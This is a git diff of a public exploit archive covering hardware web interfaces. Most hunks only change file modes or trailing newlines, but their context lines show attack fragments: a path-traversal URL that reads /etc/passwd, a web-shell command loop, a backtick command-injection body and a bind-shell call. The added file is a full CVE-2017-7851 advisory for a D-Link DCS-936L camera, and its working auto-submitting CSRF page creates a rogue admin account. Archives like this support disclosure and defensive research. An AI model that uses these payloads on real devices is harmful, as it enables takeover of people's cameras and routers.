a/platforms/hardware/webapps/37625.txt b/platforms/hardware/webapps/37625.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37626.txt b/platforms/hardware/webapps/37626.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37770.txt b/platforms/hardware/webapps/37770.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37778.txt b/platforms/hardware/webapps/37778.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37965.txt b/platforms/hardware/webapps/37965.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38004.txt b/platforms/hardware/webapps/38004.txt old mode 100755 new mode 100644 index 0519333b4..38c25617b --- a/platforms/hardware/webapps/38004.txt +++ b/platforms/hardware/webapps/38004.txt @@ -90,7 +90,4 @@ http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX583 Shad Malloy -Secure Network Management, LLC - - - \ No newline at end of file +Secure Network Management, LLC \ No newline at end of file diff --git a/platforms/hardware/webapps/38029.txt b/platforms/hardware/webapps/38029.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38034.txt b/platforms/hardware/webapps/38034.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38056.txt b/platforms/hardware/webapps/38056.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38073.html b/platforms/hardware/webapps/38073.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38080.txt b/platforms/hardware/webapps/38080.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38081.txt b/platforms/hardware/webapps/38081.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38097.txt b/platforms/hardware/webapps/38097.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38245.txt b/platforms/hardware/webapps/38245.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38350.txt b/platforms/hardware/webapps/38350.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38369.txt b/platforms/hardware/webapps/38369.txt old mode 100755 new mode 100644 index 571ebaeda..9ed78e4c4 --- a/platforms/hardware/webapps/38369.txt +++ b/platforms/hardware/webapps/38369.txt @@ -96,5 +96,4 @@ Set-Cookie: HcsoB=60cd4a687de94857; path=/; <cltid>0x478e</cltid><sessionid>0x00000000</sessionid><auth>1</auth><protocol>TCP</protocol> <result> <err>0x40</err> </result> -</rcp> - \ No newline at end of file +</rcp> \ No newline at end of file diff --git a/platforms/hardware/webapps/38409.html b/platforms/hardware/webapps/38409.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38448.txt b/platforms/hardware/webapps/38448.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38449.txt b/platforms/hardware/webapps/38449.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38455.txt b/platforms/hardware/webapps/38455.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38470.txt b/platforms/hardware/webapps/38470.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38471.txt b/platforms/hardware/webapps/38471.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38488.txt b/platforms/hardware/webapps/38488.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38514.py b/platforms/hardware/webapps/38514.py index cd2d57a69..2deaa26fa 100755 --- a/platforms/hardware/webapps/38514.py +++ b/platforms/hardware/webapps/38514.py @@ -211,5 +211,4 @@ else: else: print 'Please choose a sensible input next time, exiting.' input('Press Enter to continue...') - sys.exit() - \ No newline at end of file + sys.exit() \ No newline at end of file diff --git a/platforms/hardware/webapps/38553.txt b/platforms/hardware/webapps/38553.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38575.txt b/platforms/hardware/webapps/38575.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38604.txt b/platforms/hardware/webapps/38604.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38657.html b/platforms/hardware/webapps/38657.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38707.txt b/platforms/hardware/webapps/38707.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38772.txt b/platforms/hardware/webapps/38772.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38773.txt b/platforms/hardware/webapps/38773.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38840.txt b/platforms/hardware/webapps/38840.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38913.txt b/platforms/hardware/webapps/38913.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38914.txt b/platforms/hardware/webapps/38914.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38929.txt b/platforms/hardware/webapps/38929.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/38971.txt b/platforms/hardware/webapps/38971.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39184.txt b/platforms/hardware/webapps/39184.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39407.txt b/platforms/hardware/webapps/39407.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39408.txt b/platforms/hardware/webapps/39408.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39409.txt b/platforms/hardware/webapps/39409.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39412.txt b/platforms/hardware/webapps/39412.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39581.txt b/platforms/hardware/webapps/39581.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39622.txt b/platforms/hardware/webapps/39622.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39641.html b/platforms/hardware/webapps/39641.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39659.txt b/platforms/hardware/webapps/39659.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39672.txt b/platforms/hardware/webapps/39672.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39677.html b/platforms/hardware/webapps/39677.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39683.txt b/platforms/hardware/webapps/39683.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39696.txt b/platforms/hardware/webapps/39696.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39716.py b/platforms/hardware/webapps/39716.py index 365318d9b..ab1d0b3e7 100755 --- a/platforms/hardware/webapps/39716.py +++ b/platforms/hardware/webapps/39716.py @@ -220,5 +220,4 @@ while(1): if cmd.strip() != "quit" : sendcmd(cmd) else : - sys.exit() - \ No newline at end of file + sys.exit() \ No newline at end of file diff --git a/platforms/hardware/webapps/39798.txt b/platforms/hardware/webapps/39798.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39951.txt b/platforms/hardware/webapps/39951.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/39962.txt b/platforms/hardware/webapps/39962.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40016.txt b/platforms/hardware/webapps/40016.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40158.txt b/platforms/hardware/webapps/40158.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40159.txt b/platforms/hardware/webapps/40159.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40207.txt b/platforms/hardware/webapps/40207.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40276.txt b/platforms/hardware/webapps/40276.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40284.txt b/platforms/hardware/webapps/40284.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40432.txt b/platforms/hardware/webapps/40432.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40626.txt b/platforms/hardware/webapps/40626.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40629.txt b/platforms/hardware/webapps/40629.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40640.txt b/platforms/hardware/webapps/40640.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40690.txt b/platforms/hardware/webapps/40690.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40837.txt b/platforms/hardware/webapps/40837.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40853.txt b/platforms/hardware/webapps/40853.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40856.txt b/platforms/hardware/webapps/40856.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40887.txt b/platforms/hardware/webapps/40887.txt old mode 100755 new mode 100644 index af4422c77..6b0b1c40b --- a/platforms/hardware/webapps/40887.txt +++ b/platforms/hardware/webapps/40887.txt @@ -24,4 +24,4 @@ For more details visit http://justpentest.blogspot.in/2016/12/lfi-and-xss-on-cis 4) References: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20131011-CVE-2013-5528 -https://bst.cloudapps.cisco.com/bugsearch/bug/CSCui78815 \ No newline at end of file +https://bst.cloudapps.cisco.com/bugsearch/bug/CSCui78815 \ No newline at end of file diff --git a/platforms/hardware/webapps/40898.txt b/platforms/hardware/webapps/40898.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40901.txt b/platforms/hardware/webapps/40901.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40977.txt b/platforms/hardware/webapps/40977.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40978.txt b/platforms/hardware/webapps/40978.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40982.html b/platforms/hardware/webapps/40982.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/40983.html b/platforms/hardware/webapps/40983.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41017.txt b/platforms/hardware/webapps/41017.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41033.txt b/platforms/hardware/webapps/41033.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41074.txt b/platforms/hardware/webapps/41074.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41147.txt b/platforms/hardware/webapps/41147.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41170.txt b/platforms/hardware/webapps/41170.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41175.txt b/platforms/hardware/webapps/41175.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41208.txt b/platforms/hardware/webapps/41208.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41299.html b/platforms/hardware/webapps/41299.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41361.txt b/platforms/hardware/webapps/41361.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41402.txt b/platforms/hardware/webapps/41402.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41404.html b/platforms/hardware/webapps/41404.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41472.html b/platforms/hardware/webapps/41472.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41478.txt b/platforms/hardware/webapps/41478.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41502.txt b/platforms/hardware/webapps/41502.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41571.txt b/platforms/hardware/webapps/41571.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41572.txt b/platforms/hardware/webapps/41572.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41573.txt b/platforms/hardware/webapps/41573.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41625.txt b/platforms/hardware/webapps/41625.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41626.txt b/platforms/hardware/webapps/41626.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41633.txt b/platforms/hardware/webapps/41633.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41671.txt b/platforms/hardware/webapps/41671.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41782.txt b/platforms/hardware/webapps/41782.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41821.txt b/platforms/hardware/webapps/41821.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41829.txt b/platforms/hardware/webapps/41829.txt old mode 100755 new mode 100644 index b70003f74..555b9b7aa --- a/platforms/hardware/webapps/41829.txt +++ b/platforms/hardware/webapps/41829.txt @@ -114,5 +114,4 @@ DISCLAIMER INFO All content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security, and are licensed under a Creative Commons Attribution Non-Commercial 3.0 (South Africa) License: http://za.creativecommons.org/ and other countries as and when -stipulated. - \ No newline at end of file +stipulated. \ No newline at end of file diff --git a/platforms/hardware/webapps/41840.txt b/platforms/hardware/webapps/41840.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41863.php b/platforms/hardware/webapps/41863.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/41998.txt b/platforms/hardware/webapps/41998.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42013.txt b/platforms/hardware/webapps/42013.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42039.txt b/platforms/hardware/webapps/42039.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42062.txt b/platforms/hardware/webapps/42062.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42074.txt b/platforms/hardware/webapps/42074.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42075.txt b/platforms/hardware/webapps/42075.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42252.txt b/platforms/hardware/webapps/42252.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42293.txt b/platforms/hardware/webapps/42293.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42307.txt b/platforms/hardware/webapps/42307.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42308.txt b/platforms/hardware/webapps/42308.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42309.txt b/platforms/hardware/webapps/42309.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42313.txt b/platforms/hardware/webapps/42313.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42320.txt b/platforms/hardware/webapps/42320.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42321.txt b/platforms/hardware/webapps/42321.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42322.txt b/platforms/hardware/webapps/42322.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42323.txt b/platforms/hardware/webapps/42323.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42326.txt b/platforms/hardware/webapps/42326.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42352.txt b/platforms/hardware/webapps/42352.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42388.txt b/platforms/hardware/webapps/42388.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42408.txt b/platforms/hardware/webapps/42408.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42427.html b/platforms/hardware/webapps/42427.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42449.html b/platforms/hardware/webapps/42449.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42450.php b/platforms/hardware/webapps/42450.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42547.py b/platforms/hardware/webapps/42547.py index a943feb3c..d50046408 100755 --- a/platforms/hardware/webapps/42547.py +++ b/platforms/hardware/webapps/42547.py @@ -61,4 +61,4 @@ fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n') print "Exploiting....." print '\n' URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard" -print urllib2.urlopen(URL).read() +print urllib2.urlopen(URL).read() \ No newline at end of file diff --git a/platforms/hardware/webapps/42581.txt b/platforms/hardware/webapps/42581.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42588.txt b/platforms/hardware/webapps/42588.txt old mode 100755 new mode 100644 index 512c2f5be..1d9c5d11c --- a/platforms/hardware/webapps/42588.txt +++ b/platforms/hardware/webapps/42588.txt @@ -114,4 +114,4 @@ User3.privilege=2 The vendor has been contacted and the firmware was updated. See disclosure in: -https://www.brickcom.com/news/productCERT_security_advisorie.php +https://www.brickcom.com/news/productCERT_security_advisorie.php \ No newline at end of file diff --git a/platforms/hardware/webapps/42608.txt b/platforms/hardware/webapps/42608.txt old mode 100755 new mode 100644 index 638b45c2d..c6e53ac8e --- a/platforms/hardware/webapps/42608.txt +++ b/platforms/hardware/webapps/42608.txt @@ -30,4 +30,4 @@ sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us" 29/4/2017 – Vulnerability Discovered. 29/4/2017 - Vendor not responding. -03/09/2017 – Exploit published. +03/09/2017 – Exploit published. \ No newline at end of file diff --git a/platforms/hardware/webapps/42633.txt b/platforms/hardware/webapps/42633.txt old mode 100755 new mode 100644 index b17c1e922..18ccc6395 --- a/platforms/hardware/webapps/42633.txt +++ b/platforms/hardware/webapps/42633.txt @@ -34,4 +34,4 @@ rawFile.onreadystatechange = function() { }; rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true); //pega a source da página /popupSiteSurveyRpm.htm -rawFile.send(); +rawFile.send(); \ No newline at end of file diff --git a/platforms/hardware/webapps/42634.txt b/platforms/hardware/webapps/42634.txt old mode 100755 new mode 100644 index 9f3392a8b..4aed790a7 --- a/platforms/hardware/webapps/42634.txt +++ b/platforms/hardware/webapps/42634.txt @@ -20,4 +20,4 @@ http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd https://www.linkedin.com/in/ahmet-mersin-177398b0/ -@gaissecurity +@gaissecurity \ No newline at end of file diff --git a/platforms/hardware/webapps/42649.txt b/platforms/hardware/webapps/42649.txt old mode 100755 new mode 100644 index dbf8f916b..c211445d7 --- a/platforms/hardware/webapps/42649.txt +++ b/platforms/hardware/webapps/42649.txt @@ -132,4 +132,4 @@ match your new configuration. Credits: ======= -Ibad Shah, Taimooor Zafar, Owais Mehtab +Ibad Shah, Taimooor Zafar, Owais Mehtab \ No newline at end of file diff --git a/platforms/hardware/webapps/42651.txt b/platforms/hardware/webapps/42651.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42729.py b/platforms/hardware/webapps/42729.py index ce71b4eeb..215a79a87 100755 --- a/platforms/hardware/webapps/42729.py +++ b/platforms/hardware/webapps/42729.py @@ -19,6 +19,4 @@ url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT) auth = "%0aAUTHORIZED_GROUP%3d1" data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth -print(rq.get(url, data=data, headers=headers_multipart).text) - - +print(rq.get(url, data=data, headers=headers_multipart).text) \ No newline at end of file diff --git a/platforms/hardware/webapps/42732.py b/platforms/hardware/webapps/42732.py index adaacfd83..e9acf0044 100755 --- a/platforms/hardware/webapps/42732.py +++ b/platforms/hardware/webapps/42732.py @@ -53,4 +53,4 @@ def main(): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/hardware/webapps/42739.txt b/platforms/hardware/webapps/42739.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42740.txt b/platforms/hardware/webapps/42740.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42785.sh b/platforms/hardware/webapps/42785.sh index 5f38764bb..81d0fc77e 100755 --- a/platforms/hardware/webapps/42785.sh +++ b/platforms/hardware/webapps/42785.sh @@ -98,4 +98,4 @@ while true; do echo -ne "\\033[00m"; shell="http://$ip:$port/maintenance/test.php?c=${cmd// /+}" curl "$shell" -done +done \ No newline at end of file diff --git a/platforms/hardware/webapps/42786.txt b/platforms/hardware/webapps/42786.txt old mode 100755 new mode 100644 index 40d602966..cf7de6889 --- a/platforms/hardware/webapps/42786.txt +++ b/platforms/hardware/webapps/42786.txt @@ -370,4 +370,4 @@ Product info: http://TARGET/api/system/config/product -{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]} +{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]} \ No newline at end of file diff --git a/platforms/hardware/webapps/42788.txt b/platforms/hardware/webapps/42788.txt old mode 100755 new mode 100644 index b1d519a03..1916c1dd7 --- a/platforms/hardware/webapps/42788.txt +++ b/platforms/hardware/webapps/42788.txt @@ -57,4 +57,4 @@ Accept-Language: en-US,en;q=0.8,mk;q=0.6 Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b Connection: close -dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60 +dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60 \ No newline at end of file diff --git a/platforms/hardware/webapps/42789.txt b/platforms/hardware/webapps/42789.txt old mode 100755 new mode 100644 index d63a3ce11..a300c2a29 --- a/platforms/hardware/webapps/42789.txt +++ b/platforms/hardware/webapps/42789.txt @@ -48,4 +48,4 @@ Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php PoC: http://TARGET:8081/graphics/livevideo/stream/stream3.jpg -http://TARGET:8081/graphics/livevideo/stream/stream1.jpg +http://TARGET:8081/graphics/livevideo/stream/stream1.jpg \ No newline at end of file diff --git a/platforms/hardware/webapps/42916.py b/platforms/hardware/webapps/42916.py index f748791ee..018dcb895 100755 --- a/platforms/hardware/webapps/42916.py +++ b/platforms/hardware/webapps/42916.py @@ -28,4 +28,4 @@ url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg" header = {'Cookie': 'admin:language=pt'} #setando o cookie no header r = get(url, headers=header).text -print(r) +print(r) \ No newline at end of file diff --git a/platforms/hardware/webapps/42931.txt b/platforms/hardware/webapps/42931.txt old mode 100755 new mode 100644 index f77c29802..6bf229a56 --- a/platforms/hardware/webapps/42931.txt +++ b/platforms/hardware/webapps/42931.txt @@ -23,4 +23,4 @@ words). And go url: http://dvr-domain.dynns.com:XX/doc/page/main.asp. It will Authentication Bypass 3. Solution: -Update to Firmware version V3.0.0 build20170925 +Update to Firmware version V3.0.0 build20170925 \ No newline at end of file diff --git a/platforms/hardware/webapps/42933.txt b/platforms/hardware/webapps/42933.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42947.txt b/platforms/hardware/webapps/42947.txt old mode 100755 new mode 100644 index 1991eff3d..4c7511780 --- a/platforms/hardware/webapps/42947.txt +++ b/platforms/hardware/webapps/42947.txt @@ -35,4 +35,4 @@ PING 127.0.0.1 (127.0.0.1): 56 data bytes 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.214/0.304/0.617 ms root -uid=0(root) gid=0 groups=0 +uid=0(root) gid=0 groups=0 \ No newline at end of file diff --git a/platforms/hardware/webapps/42956.txt b/platforms/hardware/webapps/42956.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/42986.txt b/platforms/hardware/webapps/42986.txt old mode 100755 new mode 100644 index 79165dedd..0e4d716c4 --- a/platforms/hardware/webapps/42986.txt +++ b/platforms/hardware/webapps/42986.txt @@ -19,7 +19,4 @@ PoC: - Then put the script (<script>alert(1)</script>) -- Xss Vulnerability - - - +- Xss Vulnerability \ No newline at end of file diff --git a/platforms/hardware/webapps/43022.py b/platforms/hardware/webapps/43022.py index 015b85ad3..104c7ab5d 100755 --- a/platforms/hardware/webapps/43022.py +++ b/platforms/hardware/webapps/43022.py @@ -166,4 +166,4 @@ if __name__ == '__main__': ###### Both exploits result in the same bind shell ###### #first_exploit(data[0], data[1]) - second_exploit(next_url, encoded_string). \ No newline at end of file + second_exploit(next_url, encoded_string). \ No newline at end of file diff --git a/platforms/hardware/webapps/43023.txt b/platforms/hardware/webapps/43023.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/43146.txt b/platforms/hardware/webapps/43146.txt new file mode 100644 index 000000000..54b72b7ac --- /dev/null +++ b/platforms/hardware/webapps/43146.txt @@ -0,0 +1,73 @@ +# Exploit Title: [D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability] +# Date: [26/03/2017] +# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot +# Vendor Homepage: [http://us.dlink.com/product-category/home-solutions/view/network-cameras/] +# Version: [Tested on DCS-936L with firmware version 1.03. Other versions/models are also be affected] +# Tested on: [DCS-936L with firmware version 1.02.01] +# CVE : [CVE-2017-7851] + +================== +#Product:- +================== +Small and unobtrusive, SecuriCam™ IP surveillance solutions from D-Link allow you to monitor your offices or warehouses from anywhere - at anytime. Extreme Low LUX optics, 2 way audio, and full pan/tilt/zoom manipulation provide everything an SMB needs to safeguard their valuable resources. + +================== +#Vulnerability:- +================== +D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability. + +======================== +#Vulnerability Details:- +======================== + +============================================================================================================================= +D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability (CVE-2017-7851) +============================================================================================================================= +D-Link DCS-936L devices with firmware 1.02.01 have CSRF. If a victim is logged into the camera's web console and visits a malicious site hosting a <Target_Device_IP.HTML> from another tab in the same browser, the malicious site can send requests to the victim's device. An attacker can add a new user, replace the firmware image with a malicious one, or connect the victim's device to a rogue Wireless Network. + +An attacker can easily find out public IP address of victim's device on Shodan or similar search engines to create <Target_Device_IP.HTML> file. Victim must be logged into the camera's web console and visit attacker's site from another tab in the same browser. + +#Proof-of-Concept:- +------------------- +D-Link DCS-936L prevents CSRF attack by looking at ‘Referer’ header. The ‘Referer’ IP should match with the one in ‘HOST’ header. If it does not, HTTP 403 is returned in the response. However, this device does not perform a strict check on ‘Referer’ header. It seems that it looks for the device’s IP address (which is the one in ‘HOST’ header) anywhere in the ‘Referer’ header. If found, it happily accepts the request. +An unauthenticated, remote attacker could host a malicious site that makes requests to the victim’s device without having credentials. In a targeted attack, an attacker needs to trick victim to visit a malicious site that exploits this vulnerability. + +1. Attacker hosts a ‘<target_ip>.html’ on <attacking_ip> + + <html> + <body> + <form id="CSRF" action="http://<target_ip>/eng/admin/tools_admin.cgi" method="POST"> + <input type="hidden" name="user" value="hacker"> + <input type="hidden" name="action" value="set"> + <input type="hidden" name="password" value="abc123"> + <input type="hidden" name="confirmPassword" value="abc123"> + </form> + + <script> + window.onload = function(){ + document.forms['CSRF'].submit() + } + </script> + + </body> + + </html> + + +2. Victim logs into his device. +3. Victim then visits attackers site http://<attacking_ip>/<target_ip>.html +4. Above request adds a new user ‘Hacker’ which reboots the web server. +6. Browser sends add new user request to the target device <target_ip>. Victim's browser sets 'Referer' header to 'http://<attacking_ip>/<target_ip>.html'. As this contains the IP address of the device (<target_ip>), this request is processed successfully. +7. Server response shows user hacker added successfully: +8. Attacker can now log into the device as hacker/abc123 + +=================================== +#Vulnerability Disclosure Timeline: +=================================== + +26/03/2017: First email to disclose vulnerability to D-Link incident 